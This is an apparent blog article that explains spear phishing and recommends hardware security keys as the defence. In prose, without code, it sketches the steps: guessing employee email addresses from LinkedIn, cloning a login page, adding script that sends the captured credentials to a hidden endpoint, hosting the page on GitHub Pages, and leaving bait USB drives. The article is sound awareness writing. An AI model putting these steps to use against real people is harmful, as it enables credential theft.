The Anatomy of a Spear Phishing 🐠Assault
Spear phishing is a targeted attack on a group of individuals who have access to highly valued information. It typically uses falsified websites to trick victims into devolving their user name and password.
You might think that you are not a likely target for spear phishing but you would be surprised to learn how valuable the information that you access actually is. The documents on your own computer may be trivial however with your password other computers can be accessed over your company’s network. Using your credentials an attacker might access remote servers containing sensitive financial or proprietary information. You do not need to be a c-suite executive to be targeted. You could be a help desk tech, a software tester, or anybody that would legitimately have access to the targeted infrastructure.
Imagine, for example, the hacker wanted access to the data of the fictional XYZ corp. The hacker could probably find many of the employees by their first and last name on LinkedIn. This hacker might guess their work email address by combining the first name, last name, and company domain, so John Doe becomes jdoe@xyz.com. Said hacker might also add extra sequential numbers after the name in case there is more than one John Doe employed by the XYZ corp (jdoe2@xyz.com, …). Additionally, based on your co-workers LinkedIn page’s certifications, an attacker could gain tactical intelligence about the type of infrastructure used at XYZ corp.
The hacker would then need to create a realistic landing page to capture the credentials. Imagine the sign-in page for Google Gmail or Microsoft Outlook. Creating a pixel perfect copy of one of these pages is surprisingly easy for someone with basic FED skills. Google Chrome has the ability to save an entire web page into one file. Simply right-click anywhere on the page and select Save As > Webpage Complete. This will create a somewhat working copy of the sign-in page on the local drive. The hacker would then inject some simple JavaScript to asynchronously save the credentials in some secret location. Maybe use an anonymous and disposable Salesforce developer’s org via web-to-lead iframe.
Now, where to host this phony page? Github allows Internet accessible pages via their gh-pages repositories. An advantage here is that these pages are HTTPS by default, no credit card or phone number required. Trying to serve a faux sign-in page on insecure HTTP would be a conspicuous red flag.
The only thing left is the email itself. Not my area of expertise but I have to believe that those written in proper English are more successful. Yes, I am referring to the Nigerian Prince correspondence.
Getting a bogus email past corporate spam bots can be tricky. Time to think outside the in-box (I’m sorry). The hacker might think to create 100 promo USB sticks with the XYZ company logo laser etched. Then they might create some PDFs with juicy file names like, TaxReturns.pdf, CEOProposal.pdf, or [employee name].pdf. Distribute liberally in the bathrooms, cafeterias, and parking lots of XYZ campus.
Why does this method work? This works because people type the same password habitually without much concentration on the where and why. This is compounded by the fact that people reuse passwords for convenience. The assumption is that if a hacker can acquire your Gmail password then your AD (active directory) password would likely be very similar. Similar enough to brute force guess successfully.
It’s well-established how dangerous spear phishing is and how easily it can reach you. With that in mind, how does one protect oneself?
Use a key. No, not a mechanical key.
The popular options are either a Titan or Yubikey. When you use a physical key a hacker cannot access your account even if he/she has the password.
Google recently launched their Advanced Protection Program specifically to help people “likely” to be targets of spear phishing. They talk about how reporters, activists, and politicians are likely targets. That’s reasonable, but as we’ve discussed, the most “likely” targets don’t even know they are valuable targets. Anyone can be a target by association. Stay safe!
